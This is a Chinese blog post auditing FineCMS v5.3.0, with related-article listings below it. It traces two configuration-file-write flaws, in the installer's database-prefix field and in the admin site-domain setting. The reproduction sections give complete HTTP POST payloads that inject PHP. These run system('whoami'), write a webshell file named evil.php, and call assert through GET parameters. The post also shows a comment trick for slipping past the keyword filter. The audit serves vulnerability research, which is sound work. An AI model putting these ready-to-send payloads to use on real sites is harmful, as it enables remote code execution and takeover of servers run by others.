finecms aip.php漏洞,FineCMS漏洞挖掘

最新推荐文章于 2024-01-08 16:08:33 发布
最新推荐文章于 2024-01-08 16:08:33 发布
阅读量498 收藏
点赞数
文章标签: finecms aip.php漏洞

0x00 背景

最近在挖掘FineCMS源码的漏洞,发现了一些有趣的洞,斗哥计划先从配置文件写入开始分析,然后再结合存储XSS进行GetShell,本篇先分析配置文件写入的问题,下周再分析存储XSS的问题,最终通过这两类洞的组合利用GetShell,大体思路流程很简单,但是代码分析中有蛮多技巧,期待与师傅们的交流讨论。

0x01 漏洞审计

1x00 相关环境

源码信息:FineCMS v5.3.0 bulid 20180206

问题文件: \finecms\finecms\system\core\Input.php

漏洞类型:配置文件写入问题

1x01 漏洞分析

在\finecms\finecms\dayrui\controllers\Install.php文件中的第127-131行发现如下代码块。

df5a8f9fbd264b84ccfa6c029fb868b6.png

8fa3604ed77e03f8be311d9a8d2244fe.png

通过反向追溯在当前文件中的第75行中发现$data的创建位置。

2db8d1589cfb7642b69fa6b8f2d3de4e.png

跟入post方法,在\finecms\finecms\system\core\Input.php文件中的第255行中发现发 post方法的代码块。

5c9ed6946ce94b7d4f19fea9e76d0f26.png

跟入_fetch_from_array方法,在\finecms\finecms\system\core\Input.php文件中的第177-230行中发现该方法的代码块,代码主要对传入的数组进行简单的数据判断,代码较多这里列出重要的代码,当$xss_clean为TRUE的时候会进行xss_clean操作。通过追溯$xss_clean变量,发现是从\finecms\finecms\dayrui\config\config.php配置文件中的$config['global_xss_filtering']获取的,但是默认情况下该变量的值为FALSE,不会进行任何的XSS过滤。

af30f09d6be3b10e7a581dd752464243.png

但是当$config['global_xss_filtering']为TRUE会进入\finecms\finecms\system\core\Security.php的xss_clean方法进行XSS过滤,但是不进行单引号的转义,但是还过滤了PHP的标签和一些关键函数,由于还过滤了尖括号所以标签没想到绕过方法,但是可以使用类似system/()/('whoami')的方式绕过关键字的过滤规则进行代码执行。

e55c01e783942bab1c8137dbbfaeb657.png

56f9cebc5906375240d952b593061a3d.png

因此此处可以引入单引号,从而导致写入php代码进行GetShell。

1x02 漏洞复现

在进行安装的时候,如果$config['global_xss_filtering']开启了,即TRUE,可构造如下请求可以执行PHP代码导致GetShellPOST /index.php?c=install&m=index&step=3 HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Referer: [http://127.0.0.1/index.php?c=install&m=index&step=3](http://127.0.0.1/index.php?c=install&m=index&step=3)

Content-Length: 172

Connection: close

data%5Bdbhost%5D=127.0.0.1&data%5Bdbuser%5D=root&data%5Bdbpw%5D=root&data%5Bdbname%5D=FineCMS&data%5Bdbprefix%5D=fn_').die(system/*()*/('whoami'));array(//&data%5Bdemo%5D=1

如果$config['global_xss_filtering']未开启即为FALSE,进行如下请求可以GetShell。POST /index.php?c=install&m=index&step=3 HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Referer: [http://127.0.0.1/index.php?c=install&m=index&step=3](http://127.0.0.1/index.php?c=install&m=index&step=3)

Content-Length: 195

Connection: close

data%5Bdbhost%5D=127.0.0.1&data%5Bdbuser%5D=root&data%5Bdbpw%5D=root&data%5Bdbname%5D=FineCMS&data%5Bdbprefix%5D=fn_'.die(fwrite(fopen('evil.php', 'w'), '<?php phpinfo();?>')),//&data%5Bdemo%5D=1

成功写入文件并生成evil.php:

7389d427204e067fbe2dcc7f1aef6e41.png

b7b2faaa2a9b9508893a6a0dc2d28b6f.png

访问evil.php成功GetShell:

12fc0c5e40247a432100ad7d43182fb8.png

2x00 相关环境

源码信息:FineCMS v5.3.0 bulid 20180206

问题文件: \finecms\finecms\dayrui\libraries\Dconfig.php

漏洞类型:配置文件写入问题

2x01 漏洞分析

在文件\finecms\finecms\dayrui\controllers\admin\Site.php的第46-67行中发现如下代码块,使用post接收data的数据,然后在检测域名是否被使用,未被使用将更新数据库中fn_site表中的domain的字段。

f9060df7ef217337cb79a0c63ca22644.png

aad00725a5548aaa925567a3596391f4.png

跟入$this->site_model->cache(),在\finecms\finecms\dayrui\models\Site_model.php文件中的第323-368行中,发现cache()方法,重点看第325行和338行。

f3d1fa3f82c5e76d689fc5ed10ce9a6b.png

跟入$this->get_site_data()方法,在\finecms\finecms\dayrui\models\Site_model.php文件中的第285-300行发现代码块,分析代码块知道是进行如下的数据查询,把前面存到数据库中的配置,取出来然后赋给$data, 通过打印$data可以知道到的就是站点配置的信息。

96f67de6ab2444ee5fda87f15e52a306.png

2e292d1f7caf5d9047204c3c753ad47c.png

跟进$t['domain'] && $domain[$t['domain']] = $id;,$domain最终传入了如下\finecms\finecms\dayrui\models\Site_model.php文件中的第363行代码。

00aa7f06ab6e5f1e6d3ccc6405c507dc.png

因此foreach ($data as $id => $t)后对$domain[$t['domain']] = $id;进行赋值,其中为$domain变量传入了键名$t['domain'],又因为to_require_one中不会对数组的键名进行安全处理,因此可以引入单引号,存在文件写入的问题。

2x02 漏洞复现

可以通过构造如下请求进行文件写入,并执行代码的操作:POST /admin.php?c=site&m=index&func=assert&evil=system('whoami') HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0

Accept: application/json, text/javascript, /; q=0.01

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Referer: [http://127.0.0.1/admin.php?c=site&m=index](http://127.0.0.1/admin.php?c=site&m=index)

Content-Length: 95

Cookie: member_uid=1; member_cookie=398ecbf6b4b29dd1a5d0; 8b0cba072045805256806b2b24239ded_ci_session=09t3nk6i1l5bfevngel2clvbuf1504p8

Connection: close

ids[]=1&data[1][name]=FineCMS&data[1][domain]=127.0.0.1'=>1).die($_GET['func']($_GET['evil'])//

e0fe48eb690d15e9706801db3e716c9a.png

0x03 小结

本篇仅列举了两处这类问题,其实该源码还有其他处文件写入问题,大家也可以自行审计去发现。留下个小疑问,这些后台的洞大家有啥办法从前台去利用呢? 有想法的可以私我thinking_balabala@163.com,下周我将给出我的方法,期待一起交流。

夜火海星
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
FineCMS任意头像上传漏洞复现:文件的四次上传
Miracle_ze的博客
08-16 1347
1、第一次绕过代码没有文件再次检测,采用传包含文件夹的压缩包绕过或使用时间竞争漏洞绕过2、第二个绕过代码添加了递归对文件夹再次检测,但由于没有间竞争漏洞绕过问题。使用间竞争漏洞绕过3、第三次绕过代码进行随机命名文件无法猜文件名间竞争漏洞绕过失效,但是可以采用解压一半报错保存php文件4、第四次绕过代码对报错保留的文件进行了递归删除,但是我们可以欺骗系统将解码的文件判定为上级目录文件规避了递归在当前目录下是所有检测。其实这种漏洞补一处出现处,要从根本解决。.........
finecms5.4.zip
11-20
-finecms_5.4这个cms我挺喜欢的,并且也是开源的项目。-
技能篇丨FineCMS 5.0.10 多个漏洞详细分析
dfdhxb995397的博客
05-29 1140
今天是一篇关于技能提升的文章,文章中的CMS是FineCMS,版本是5.0.10版本的几个漏洞分析,主要内容是介绍漏洞修补前和修补后的分析过程,帮助大家快速掌握该技能。 注:篇幅较长,阅读用时约7分钟。 任意文件上传漏洞 1、漏洞复现 用十六进制编辑器写一个包含一句话木马的图片,去网站注册一个账号,然后到上传头像的地方。 抓包,修改文件后缀名为.php并发包。 ...
finecms aip.php漏洞,FineCMS最新版5.0.8两处getshell(附python批量poc脚本)
weixin_36474966的博客
03-11 636
0x01 前言就要被**,美其名曰:比我的web安全研究和代码审计更有前途。当然是选择原谅他啦。先审计finecms去去火,找到六处漏洞,先放两处容易被发现的getshell和对应的两个python脚本0x02 getshell第一处getshell:在C:phpStudyWWWfinecmsdayruicontrollersApi.php中的data2函数,大约在第115行,有问题的代码大约在1...
FineCMS 5.0.10漏洞集合
Unitue_逆流
10-12 9094
笔记地址: https://www.ichunqiu.com/course/59007 操作机: Windows xp IP:172.16.11.2目标机: Windows xp IP:172.16.12.2实验目的: 学习漏洞产生的原理 学习如何对此漏洞进行利用修复实验内容: FineCMS是一款基于PHP+MySql+CI框架开发的高效简洁的中小型内容管理系统。其5.0.10
web安全-文件上传漏洞-某CMS及CVE编号文件上传漏洞测试以及实例讲解
ran的博客
01-27 1664
可以看到访问后可以实现上图所示的效果,因为我们这里上传的是普通图片,不是jsp代码,所以网页返回的是一堆乱码,如果我们上传的文件是jsp文件,网页就会返回isp代码执行后的内容。在网址内添加此路径进行搜索,在回显的页面内可以看到上传的文件成功以php的形式进行了执行(因为这里上传的是图片,且没有进行修改,所以返回的全部是乱码)。将“png”改为“php”后放包,正常在上传完文件之后,会返回一个文件的地址,但是这里地址没有显示,并出现了报错。按照搜索到的方法,将“png”改为“php”后放包。
finecms-XSS(cve-2017-11629)
m0_65150886的博客
01-08 460
dayrui FineCms 5.0.10及之前的版本中的controllers/api.php文件存在跨站脚本漏洞。远程攻击者可借助c=api&m=data2请求中的‘function’参数利用该漏洞注入任意的Web脚本或HTML。Dayrui FineCms是中国天睿(Dayrui)程序设计团队发布的一套使用MVC架构和PDO数据库接口开发的内容管理系统(CMS)。借此漏洞,攻击者可以窃取用户Cookie;2.对输入和URL参数进行过滤(白名单和黑名单)1.访问http://ip:port,进入首页。
finecms的csrf漏洞(CVE-2018-18191)
FODKING的博客
12-10 3627
原理 CSRF(Cross-site request forgery)跨站请求伪造:通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。 尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。 与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性 你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。 CSRF能够做的事情包括:以
Finecms SQL注入漏洞 (CVE-2018-6893)
最新发布
m0_65150886的博客
01-08 584
借此漏洞,可导致数据库中存放的用户的隐私信息的泄露,严重的可导致网页篡改;网站被挂马,传播恶意软件;修改数据库一些字段的值,嵌入网马链接,进行挂马攻击;服务器被远程控制,被安装后门。Finecms 5.2.0版本中的controllers/member/Api.php文件存在SQL注入漏洞,该漏洞源于程序没有进行有效的过滤。远程攻击者可利用该漏洞执行SQL命令。1.访问http://ip:port,出现如下页面,开始实验。
finecms-含有前台文件上传漏洞源码包.zip
01-04
finecms-含有前台文件上传漏洞源码包,亲测真实有效、可用!如有侵权,请联系CSDN管理员删除
FineCMS v5.0.10
11-29
FineCMS(简称版或公益版)是一款基于PHP+MySql+CI框架开发的高效简洁的中小型内容管理系统,面向多终端包括Pc端网页和移动端网页,支持自定义内容模型和会员模型,并且可以自定
FineCMS公益版整合2.2和5.0.8
07-06
最新的整合版本,2系列的最终版是2.2
【文件上传】FineCMS 2.0.1.zip
01-05
文件上传靶场(附带环境 可以直接使用)
FineCMS.rar_finecms
09-23
finecms1.9.10 版本 目前测试正常版本
finecms.rar_finecms 插件
09-22
FineCMS是一款基于PHP+MySql运行环境的内容管理系统,采用MVC设计模式,实现业务逻辑与表现层的适当分离,使网页设计师能够轻松设计出理想的模板。FineCMS采用插件化方式开发,功能易用便于扩展,支持自定义内容模型...
FineCMS 5.0.10 多个 漏洞详细分析过程
xiaoi123的博客
11-20 3064
i春秋作家:F0rmat 0x01 前言 已经一个月没有写文章了,最近发生了很多事情,水文一篇。 今天的这个CMS是FineCMS,版本是5.0.10版本的几个漏洞分析,从修补漏洞前和修补后的两方面去分析。 文中的evai是特意写的,因为会触发论坛的防护机制,还有分页那一段的代码也去掉了,因为会触发论坛分页的bug。 0x02 环境搭建 https://www.ichunqiu.co...
finecms aip.php漏洞,finecms V5 会员头像任意文件上传漏洞 附修复代码
weixin_31292729的博客
03-11 181
if (preg_match('/^(data:\s*image\/(png|jpg|jpeg);base64,)/', $file, $result)){官方修复方案:升级到最新版,或者不能升级的,手动改代码:public function upload() {// 创建图片存储文件夹$dir = dr_upload_temp_path().'member/'.$this->uid.'/'...
关于finecms v5 会员头像 任意文件上传漏洞分析
dfdhxb995397的博客
08-30 1365
看到我私藏的一个洞被别人提交到补天拿奖金,所以我干脆在社区这里分享,给大家学习下 本文原创作者:常威,本文属i春秋原创奖励计划,未经许可禁止转载! 1.定位功能 下载源码在本地搭建起来后,正常登陆了用户后,我们为用户上传头像的时候用burp抓包,看看这个请求动作的细节 POST /index.php?s=member&c=account&m=uploa...
finecms aip.php漏洞,代码审计| FineCMS的GetShell姿势
weixin_42311115的博客
03-11 377
0x00 背景上周,发现了finecms的一些后台的洞,斗哥先从配置文件写入开始分析,然后再结合本篇的存储XSS进行GetShell,本篇分析下存储XSS的问题,最终通过这两类洞的组合利用GetShell,期待与师傅们的交流讨论。0x01 审计过程0x00 相关环境源码信息:FineCMS v5.3.0 bulid 20180206问题文件: \finecms\finecms\system\cor...
finecms逻辑漏洞
06-06
FineCMS是一款开源的内容管理系统,它的逻辑漏洞可能会导致安全问题。以下是FineCMS常见的逻辑漏洞: 1.未经身份验证的访问:FineCMS的某些页面没有进行身份验证,可能会通过直接访问URL来绕过身份验证机制,获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值